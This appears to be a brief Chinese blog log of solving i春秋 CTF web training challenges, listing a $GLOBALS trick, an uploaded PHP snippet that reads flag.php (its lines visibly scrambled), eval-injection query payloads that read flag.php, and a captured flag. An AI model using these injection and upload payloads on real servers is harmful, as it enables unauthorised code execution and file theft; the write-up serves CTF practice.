2018-11-22WEB题记录

题目链接https://www.ichunqiu.com/battalion
选择CTF训练,全部题库,Web分类,从通过人数排序
第一题:Misc Web 爆破-1
php代码,要求给一个6位变量
大佬题解:直接GLOBALS看所有变量就可以了
$$a提示超变量GLOBALS有效

第二题:Web Upload
提示是flag在flag.php里
直接打开发现可以看到一句here_is_flag,但是没有flag(后来知道是写在注释里了)
上传的文件在/u/xxx.xxx里
后来知道这是可以运行代码的,尝试直接上传php代码
fh,filesize("../flag.php"));
fclose(fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread(fh);

成功得到注释中的flag

第三题:Web 爆破-2
源码审计,eval( "var_dump($a);");
可以执行代码,两种方法
1)?hello=file_get_contents('flag.php')
2)?hello=file("flag.php")
3)?hello=);echo%20cat%20flag.php + ctrl + u 查看源码 (我没试出来)
flag{9bc5fa0c-37ab-4b1c-8ac0-3de6c2fed8f7}

第四题:SQL注入
sqlmap报错,不知道为什么

你可能感兴趣的:(2018-11-22WEB题记录)